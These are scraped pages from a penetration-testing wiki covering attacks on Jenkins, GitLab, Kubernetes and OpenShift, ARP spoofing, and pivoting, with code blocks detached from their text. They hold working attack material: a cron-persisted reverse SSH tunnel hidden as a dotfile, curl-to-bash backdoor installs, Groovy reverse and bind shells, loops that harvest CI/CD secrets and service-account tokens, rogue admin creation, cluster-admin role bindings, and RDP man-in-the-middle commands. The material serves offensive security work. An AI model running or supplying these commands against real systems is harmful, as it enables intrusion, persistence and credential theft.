#!/bin/bash if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then /usr/bin/ssh -nNT -R 2222:localhost:22 [-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa] [-oServerAliveInterval=300 -oServerAliveCountMax=3] -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentitiesOnly=yes -i /home/alice/.ssh/.k nopty@10.10.13.37 fi Copy $ sudo -i # useradd -ms /bin/false nopty # mkdir /home/nopty/.ssh # ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N "" # cat /home/nopty/.ssh/dummy_key.pub # echo 'from="10.10.13.38",command="echo Only port forwarding is allowed",no-agent-forwarding,no-X11-forwarding,no-pty '`cat /home/nopty/.ssh/dummy_key.pub` > /home/nopty/.ssh/authorized_keys # chown -R nopty:nopty .ssh Copy $ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k $ chmod 600 /home/alice/.ssh/.k $ curl 10.10.13.37/callback.sh > /home/alice/.conf $ chmod +x /home/alice/.conf $ crontab -e */15 * * * * /home/alice/.conf Copy $ bash -c "$(curl -fsSL gsocket.io/x)" $ bash -c "$(wget -qO- gsocket.io/x)" Copy $ cd ~/tools && bash -c "$(curl -fsSL https://tiny.cc/gsinst)" && cd $ ~/tools/gsocket/tools/gs-netcat -s "" -i Copy $ GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)" $ GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)" $ pkill gs-bd --- # Jenkins | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/jenkins.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/jenkins#script-console-abuse) Script Console Abuse ---------------------------------------------------------------------------------------------------------------- * [https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6](https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6) * [https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) * [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn_jenkins) * "Manage Jenkins" > "Script Console" > Run. Execute command: exec.groovy Copy def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'whoami'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" Reverse shell: reverse.groovy Copy String host = ""; int port = ; String cmd = "/bin/bash"; // or "cmd.exe" for Windows Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s = new Socket(host, port); InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); OutputStream po = p.getOutputStream(), so = s.getOutputStream(); while (!s.isClosed()) { while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read()); while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e) {} }; p.destroy(); s.close(); Bind shell: Last updated 2 years ago bind.groovy Copy int port = ; String cmd="/bin/bash"; // or "cmd.exe" for Windows Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s = new java.net.ServerSocket(port).accept(); InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); OutputStream po = p.getOutputStream(), so = s.getOutputStream(); while (!s.isClosed()) { while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read()); while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e) {} }; p.destroy(); s.close(); --- # GitLab | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab.md) . * [https://devcraft.io/assets/hacktivitycon-slides.pdf](https://devcraft.io/assets/hacktivitycon-slides.pdf) * [https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/](https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/) * [https://github.com/dotPY-hax/gitlab\_RCE](https://github.com/dotPY-hax/gitlab_RCE) [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#search-for-secrets) Search for Secrets ----------------------------------------------------------------------------------------------------------- * [https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/](https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/) * [https://rtfm.co.ua/en/git-scanning-repositories-for-secrets-using-gitleaks/](https://rtfm.co.ua/en/git-scanning-repositories-for-secrets-using-gitleaks/) Search for CI/CD variables and runner tokens: Copy TOKEN=`cat token` GITLAB=gitlab.megacorp.local API="https://$GITLAB/api/v4" curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq # 1. bash get_project_ids.sh | tee -a projects curl -sH "Authorization: Bearer $TOKEN" "$API/groups//projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id' # 2. bash get_secrets.sh for id in `cat projects`; do curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path' curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .runners_token | jq done Search for credential leaks with [gitleaks](https://github.com/zricethezav/gitleaks) : [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#gitlab-runners-abuse) GitLab Runners Abuse --------------------------------------------------------------------------------------------------------------- * [https://frichetten.com/blog/abusing-gitlab-runners/](https://frichetten.com/blog/abusing-gitlab-runners/) * [https://github.com/Frichetten/gitlab-runner-research](https://github.com/Frichetten/gitlab-runner-research) [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#ssrf-greater-than-redis-greater-than-rce-ce-ee) SSRF > Redis > RCE (CE/EE) ----------------------------------------------------------------------------------------------------------------------------------------------- **CVE-2018-19571, CVE-2018-19585** * [https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293) * [https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) * [https://www.exploit-db.com/exploits/49334](https://www.exploit-db.com/exploits/49334) Also possible to use this payload (instead of IPv6) to bypass filter checks for localhost, but works only with `git://` scheme: [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#path-traversal-greater-than-lfi-greater-than-rce-ce-ee) Path Traversal > LFI > RCE (CE/EE) --------------------------------------------------------------------------------------------------------------------------------------------------------------- **CVE-2020-10977** * [https://xakep.ru/2020/05/26/gitlab-exploit/](https://xakep.ru/2020/05/26/gitlab-exploit/) * [https://www.exploit-db.com/exploits/49076](https://www.exploit-db.com/exploits/49076) [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#path-traversal-greater-than-file-write-greater-than-rce-ee) Path Traversal > File Write > RCE (EE) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- **CVE-2019-19088** * [https://gitlab.com/gitlab-org/gitlab/-/issues/36029](https://gitlab.com/gitlab-org/gitlab/-/issues/36029) [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#gitlab-rails) gitlab-rails ----------------------------------------------------------------------------------------------- * [https://docs.gitlab.com/ee/user/profile/account/create\_accounts.html](https://docs.gitlab.com/ee/user/profile/account/create_accounts.html) Add new admin user from console: Then activate the account by navigating to `https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_`. Or just skip the verification: Also for GitLab >= 16.11 personal space assignment is required: Enable password authentication for web (e. g., when only LDAP authentication is available): Grant a low-priv user admin's privileges via API: [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#arbitrary-file-read) Arbitrary File Read ------------------------------------------------------------------------------------------------------------- **CVE-2023-2825** * [https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/](https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/) * [https://github.com/Occamsec/CVE-2023-2825#cve-2023-2825](https://github.com/Occamsec/CVE-2023-2825#cve-2023-2825) Last updated 1 year ago * [Search for Secrets](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#search-for-secrets) * [GitLab Runners Abuse](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#gitlab-runners-abuse) * [SSRF > Redis > RCE (CE/EE)](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#ssrf-greater-than-redis-greater-than-rce-ce-ee) * [Path Traversal > LFI > RCE (CE/EE)](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#path-traversal-greater-than-lfi-greater-than-rce-ce-ee) * [Path Traversal > File Write > RCE (EE)](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#path-traversal-greater-than-file-write-greater-than-rce-ee) * [gitlab-rails](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#gitlab-rails) * [Arbitrary File Read](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab#arbitrary-file-read) Copy $ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks $ TMPFILE=`mktemp`; ./gitleaks detect -s . -v -r $TMPFILE > /dev/null; cat $TMPFILE | jq; rm $TMPFILE Copy git://127.0.0.1:6379/%0a Copy $ sudo gitlab-rails console irb(main):001:0 > ActiveRecord::Base.logger = Logger.new($stdout) irb(main):002:0 > User.find(1) => # irb(main):003:0 > user = User.create(:username => 'snovvcrash', :password => 'Passw0rd!', :password_confirmation => 'Passw0rd!', :admin => true, :name => 'snovvcrash', :email => 'snovvcrash@megacorp.local') irb(main):004:0 > user.save! irb(main):005:0 > user.confirmation_token => "ZVrM4KsyEdSoTJvo8kx_" Copy irb(main):003:0 > user.skip_confirmation! irb(main):004:0 > user.save! Copy irb(main):003:0 > user.assign_personal_namespace(Organizations::Organization.default_organization) irb(main):004:0 > user.save! Copy $ sudo gitlab-rails console irb(main):001:0 > Gitlab::CurrentSettings.update!(password_authentication_enabled_for_web: true) irb(main):002:0 > exit $ sudo gitlab-ctl reconfigure Copy # Check token priveleges $ curl -sX GET -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/user" | jq '.is_admin' # Grant low-priv user admin's privileges $ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=true" | jq '.is_admin' # Revert low-priv user's original privileges $ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=false" | jq '.is_admin' --- # Containerization / Orchestration | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kubernetes) Kubernetes ------------------------------------------------------------------------------------------------------------------- * [https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security) * [https://redteamrecipe.com/100-Method-For-Container-Attacks/](https://redteamrecipe.com/100-Method-For-Container-Attacks/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kubectl) kubectl * [https://kubernetes.io/ru/docs/tasks/tools/install-kubectl/](https://kubernetes.io/ru/docs/tasks/tools/install-kubectl/) Get `kubectl`: Copy curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl chmod +x ./kubectl sudo mv ./kubectl /usr/local/bin/kubectl kubectl version --client Basic authenticated enumeration (the service account token from `/run/secrets/kubernetes.io/serviceaccount/token` can be parsed at [jwt.io](https://jwt.io/) ): Copy $ kubectl auth can-i --list $ kubectl get namespaces $ kubectl auth can-i --list -n $ kubectl get pods -n $ kubectl describe pods -n $ kubectl get secrets -n $ kubectl describe secrets -n $ kubectl --token=$(cat token) auth can-i create pods To use kubectl from a remote host: * [https://kubernetes.io/docs/tasks/extend-kubernetes/socks5-proxy-access-api/](https://kubernetes.io/docs/tasks/extend-kubernetes/socks5-proxy-access-api/) Due to proxychains mostly does not work with Go binaries, export `HTTPS_PROXY=socks5://localhost:1080` in order to use kubectl through a SOCKS tunnel. ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#bad-pods) Bad Pods * [https://github.com/BishopFox/badPods](https://github.com/BishopFox/badPods) Deploy a custom pod: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kubernetes-api-server-paths) Kubernetes API Server Paths Check these kube-apiserver paths for anonymous access (stolen from [HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services#kube-apiserver-anonymous-access) ): ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#pod-escape) Pod Escape #### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#cve-2022-0492-cgroups) CVE-2022-0492 (cgroups) * [https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/) * [https://0xdf.gitlab.io/2021/05/17/digging-into-cgroups.html](https://0xdf.gitlab.io/2021/05/17/digging-into-cgroups.html) * [https://github.com/puckiestyle/CVE-2022-0492](https://github.com/puckiestyle/CVE-2022-0492) * [https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC) * [https://github.com/carlospolop/hacktricks/blob/master/linux-unix/privilege-escalation/escaping-from-a-docker-container.md](https://github.com/carlospolop/hacktricks/blob/master/linux-unix/privilege-escalation/escaping-from-a-docker-container.md) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#node-post-exploitation) Node Post-Exploitation * [https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod#node-post-exploitation](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod#node-post-exploitation) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#clusterrole-aggregation-controller) clusterrole-aggregation-controller A study case in taking over the cluster after escaping from a pod to a worker node. Extract tokens from all the running containers: Check privileges of each token: List kube-system secrets with a discovered privileged token: Add exec privilege with `clusterrole-aggregation-controller` token to itself: Look for a privileged pod to exec into it: Do it: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#tools) Tools #### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kube-hunter) kube-hunter * [https://github.com/aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#training-labs) Training Labs * [https://www.bustakube.com/](https://www.bustakube.com/) * [https://0xdf.gitlab.io/2021/09/04/htb-unobtainium.html](https://0xdf.gitlab.io/2021/09/04/htb-unobtainium.html) [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#red-hat-openshift) Red Hat OpenShift --------------------------------------------------------------------------------------------------------------------------------- * [https://github.com/cherkavi/cheat-sheet/blob/master/openshift.md](https://github.com/cherkavi/cheat-sheet/blob/master/openshift.md) Grant a low-priv user admin's privileges across the cluster [via REST API](https://access.redhat.com/solutions/5492301) : Last updated 8 months ago * [Kubernetes](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kubernetes) * [kubectl](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kubectl) * [Bad Pods](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#bad-pods) * [Kubernetes API Server Paths](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#kubernetes-api-server-paths) * [Pod Escape](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#pod-escape) * [Node Post-Exploitation](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#node-post-exploitation) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#tools) * [Training Labs](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#training-labs) * [Red Hat OpenShift](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration#red-hat-openshift) Copy $ ls -la {/run/secrets,/var/run/secrets,/secrets}/kubernetes.io/serviceaccount $ kubectl auth can-i --list -n kube-system --token `cat token` --server https://192.168.1.11:443 --certificate-authority ca.crt Copy $ kubectl apply -f evilpod.yml $ kubectl exec --stdin --tty -it evilpod -- chroot /hostfs bash Copy /api /api/v1 /apis /apis /apis/admissionregistration.k8s.io /apis/admissionregistration.k8s.io/v1beta1 /apis/apiextensions.k8s.io /apis/apiextensions.k8s.io/v1beta1 /apis/apiregistration.k8s.io /apis/apiregistration.k8s.io/v1 /apis/apiregistration.k8s.io/v1beta1 /apis/apps /apis/apps/v1 /apis/apps/v1beta1 /apis/apps/v1beta2 /apis/authentication.k8s.io /apis/authentication.k8s.io/v1 /apis/authentication.k8s.io/v1beta1 /apis/authorization.k8s.i /apis/authorization.k8s.io/v1 /apis/authorization.k8s.io/v1beta1 /apis/autoscaling /apis/autoscaling/v1 /apis/autoscaling/v2beta1 /apis/batch /apis/batch/v1 /apis/batch/v1beta1 /apis/certificates.k8s.io /apis/certificates.k8s.io/v1beta1 Copy $ for c in `docker ps -q`; do echo $c; docker exec $c 'cat /var/run/secrets/kubernetes.io/serviceaccount/token' | tee tokens/$c; echo; echo; done Copy $ for t in `ls tokens`; do echo $t; kubectl --token `cat tokens/$t --server https://10.10.0.1 --certificate-authority ca.crt auth can-i --list -n kube-system; done Copy $ kubectl --token `cat tokens/1337deadbeef` --server https://10.10.0.1 --certificate-authority ca.crt get secrets [-o yaml] -n kube-system Copy $ kubectl --token `cat clusterrole-aggregation-controller-token` --server https://10.10.0.1 --certificate-authority ca.crt auth can-i create pods --subresource exec -n kube-system no $ kubectl --token `cat clusterrole-aggregation-controller-token` --server https://10.10.0.1 --certificate-authority ca.crt edit clusterrole system:controller:clusterrole-aggregation-controller resources: - pods - pods/exec verbs: - create $ kubectl --token `cat clusterrole-aggregation-controller-token` --server https://10.10.0.1 --certificate-authority ca.crt auth can-i create pods --subresource exec -n kube-system yes Copy $ kubectl --kubeconfig /etc/kubernetes/kubelet-kubeconfig.conf get pods --all-namespaces -o wide --filed-selector spec.nodeName=kube-master-01 $ kubectl --kubeconfig /etc/kubernetes/kubelet-kubeconfig.conf get pods some-pod-name -n some-namespace -o json | grep privileged "privileged": true Copy $ kubectl --token `cat clusterrole-aggregation-controller-token` --server https://10.10.0.1 --certificate-authority ca.crt exec -it some-pod-name -- bash cat /proc/self/status | grep Cap Copy $ kube-hunter --cidr 10.0.1.0/24 --active Copy curl -k -X POST 'https://cluster.megacorp.local:8443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings' \ -H 'Authorization: Bearer ' \ -H 'Accept: application/json' \ -H 'Content-Type: application/json' \ -d' { "kind": "ClusterRoleBinding", "apiVersion": "rbac.authorization.k8s.io/v1", "metadata": { "name": "pwned", "creationTimestamp": null }, "subjects": [\ {\ "kind": "User",\ "apiGroup": "rbac.authorization.k8s.io",\ "name": "snovvcrash@megacorp.local"\ }\ ], "roleRef": { "apiGroup": "rbac.authorization.k8s.io", "kind": "ClusterRole", "name": "admin" } }' --- # ARP Spoofing | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing.md) . * [https://idafchev.github.io/pentest/2019/10/28/combining\_arp\_poisoning\_and\_ip\_spoofing\_to\_bypass\_firewalls.html](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) * [https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/arp-poisoning](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/arp-poisoning) Enable IP forwarding: Copy $ sudo sysctl -w net.ipv4.ip_forward=1 (sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward') (edit /etc/sysctl.conf "net.ipv4.ip_forward = 1" to make it permanent) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#arpspoof-dsniff) arpspoof (dsniff) ------------------------------------------------------------------------------------------------------------------ * [https://github.com/tecknicaltom/dsniff](https://github.com/tecknicaltom/dsniff) * [https://github.com/GregHoff/dsniff](https://github.com/GregHoff/dsniff) Install: Copy $ sudo apt install dsniff -y Fire up the attack with Wireshark (filter `ip.src == VICTIM_10.0.0.5`) running: Copy $ sudo arpspoof [-i eth0] [-c both] -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1 [-r] ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-880ffd0041c394ab92ba45a4e81c2296c8dee37a%252F009.png%3Falt%3Dmedia%26token%3D409c8edb-a6f7-4f47-bdfb-863e59858632&width=768&dpr=3&quality=100&sign=d60361bc&sv=2) arpspoof Output Disassembled Wireshark filter while ARP spoofing: For Windows: [alandau/arpspoof](https://github.com/alandau/arpspoof/releases) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#portable) Portable * [https://github.com/byt3bl33d3r/arpspoof](https://github.com/byt3bl33d3r/arpspoof) * [https://github.com/malfunkt/arpfox](https://github.com/malfunkt/arpfox) As a portable alternative one may use the Python port of arpspoof compiled with PyInstaller: Another approach is to download Python dependencies locally and install them on a compromised Linux host: If you need to launch ARP spoofing on another distro (CentOS, for example), then installing OS dependencies and using a portable binary may be easier: [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#bettercap) bettercap ---------------------------------------------------------------------------------------------------- * [https://github.com/bettercap/bettercap](https://github.com/bettercap/bettercap) * [https://www.bettercap.org/modules/](https://www.bettercap.org/modules/) * [https://linuxhint.com/install-bettercap-on-ubuntu-18-04-and-use-the-events-stream/](https://linuxhint.com/install-bettercap-on-ubuntu-18-04-and-use-the-events-stream/) * [https://hackernoon.com/man-in-the-middle-attack-using-bettercap-framework-hd783wzy](https://hackernoon.com/man-in-the-middle-attack-using-bettercap-framework-hd783wzy) * [https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets](https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets) Deb dependencies (Ubuntu 18.04 LTS): * [libpcap0.8\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8_1.8.1-6ubuntu1_amd64.deb.html) * [libpcap0.8-dev\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8-dev_1.8.1-6ubuntu1_amd64.deb.html) * [libpcap-dev\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap-dev_1.8.1-6ubuntu1_amd64.deb.html) * [pkg-config\_0.29.1-0ubuntu2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/pkg-config_0.29.1-0ubuntu2_amd64.deb.html) * [libnetfilter-queue1\_1.0.2-2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue1_1.0.2-2_amd64.deb.html) * [libnfnetlink-dev\_1.0.1-3\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libnfnetlink-dev_1.0.1-3_amd64.deb.html) * [libnetfilter-queue-dev\_1.0.2-2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue-dev_1.0.2-2_amd64.deb.html) Attack: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#pyrdp) PyRDP * [https://github.com/GoSecure/pyrdp](https://github.com/GoSecure/pyrdp) * [https://github.com/GoSecure/pyrdp/blob/master/docs/bettercap-rdp-mitm.md](https://github.com/GoSecure/pyrdp/blob/master/docs/bettercap-rdp-mitm.md) * [https://github.com/GoSecure/caplets/blob/master/rdp-proxy/rdp-sniffer.cap](https://github.com/GoSecure/caplets/blob/master/rdp-proxy/rdp-sniffer.cap) Install PyRDP: Compile bettercap [from fork](https://github.com/GoSecure/bettercap) : Run the attack hoping that the RDP client `192.168.1.3` will connect to the RDP server `192.168.1.2` with NLA disabled: [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#mitigations) Mitigations -------------------------------------------------------------------------------------------------------- Mitigating ARP spoofing: 1021KB [Ruijie Anti-ARP Spoofing Technical White Paper.pdf](https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-d053c5c817f3759b3e72544649be95dc7e6420e6%2FRuijie%20Anti-ARP%20Spoofing%20Technical%20White%20Paper.pdf?alt=media&token=e6baf4dd-5ec6-4cd8-9f03-17635d419313) PDF Download[Open](https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-d053c5c817f3759b3e72544649be95dc7e6420e6%2FRuijie%20Anti-ARP%20Spoofing%20Technical%20White%20Paper.pdf?alt=media&token=e6baf4dd-5ec6-4cd8-9f03-17635d419313) Last updated 5 months ago * [arpspoof (dsniff)](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#arpspoof-dsniff) * [Portable](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#portable) * [bettercap](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#bettercap) * [PyRDP](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#pyrdp) * [Mitigations](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing#mitigations) Copy (http || ftp || smb || smb2 || ldap) && ip.src == VICTIM_10.0.0.5 Copy $ sudo apt install virtualenv $ pip install pyinstaller=3.5 $ git clone https://github.com/byt3bl33d3r/arpspoof $ cd arpspoof $ virtualenv -p `which python2` venv $ . venv/bin/activate $ pip install -r requirements.txt $ pyinstaller --onefile --paths venv/lib/python2.7/site-packages arpspoof/arpspoof.py $ file dist/arpspoof Copy Dev$ pip download --no-binary=:all: -r requirements.txt Compromised$ python -m pip install --no-index --find-links . -r requirements.txt Copy Dev$ mkdir /tmp/tcpdump && yum install --downloadonly --downloaddir=/tmp/tcpdump tcpdump Dev$ ls /tmp/tcpdump libpcap-1.5.3-12.el7.x86_64.rpm tcpdump-4.9.2-4.el7_7.1.x86_64.rpm Compromised$ rpm -i libpcap*.rpm tcpdump*.rpm Compromised$ tcpdump -nvv -i eth0 -s 65535 -w arpfox.pcap "src host VICTIM_10.0.0.5" Compromised$ ./arpfox -l Compromised$ ./arpfox -i eth0 -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1 Copy $ sudo ./bettercap --iface eth0 --caplet arpspoof.cap arpspoof.cap Copy # Quick recon of the network net.probe on # Set the ARP spoofing set arp.spoof.targets $CLIENT_IP set arp.spoof.internal false set arp.spoof.fullduplex false # Control logging and verbosity events.ignore endpoint events.ignore net.sniff # Start the modules arp.spoof on net.sniff on Copy $ sudo apt update $ sudo apt install python3 python3-pip python3-dev python3-setuptools python3-venv build-essential python3-dev git openssl libgl1-mesa-glx libnotify-bin libxkbcommon-x11-0 libxcb-xinerama0 libavformat-dev libavcodec-dev libavdevice-dev libavutil-dev libswscale-dev libswresample-dev libavfilter-dev -y $ git clone https://github.com/gosecure/pyrdp ~/tools/pyrdp && cd ~/tools/pyrdp $ python3 -m venv venv && source venv/bin/activate $ pip install -U pip setuptools wheel $ pip install -U -e '.[full]' Copy $ sudo apt install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev -y $ mkdir -p $GOPATH/src/github.com/bettercap && cd $GOPATH/src/github.com/bettercap $ git clone https://github.com/GoSecure/bettercap -b rdp-mitm --single-branch && cd bettercap $ go mod init && go mod tidy && go get && go mod vendor && go build Copy $ curl -sSL https://github.com/GoSecure/caplets/raw/master/rdp-proxy/rdp-sniffer.cap -o rdp-sniffer.cap $ pyrdp-player.py -p 3000 $ sudo ./bettercap -iface eth0 -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.1.2, 192.168.1.3; set rdp.proxy.targets 192.168.1.2; set rdp.proxy.player.ip 127.0.0.1; set rdp.proxy.replay true; set rdp.proxy.command `which pyrdp-mitm.py`" $ sudo arpspoof -i eth0 -t 192.168.1.3 192.168.1.2 -r --- # Pivoting | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling.md) . * 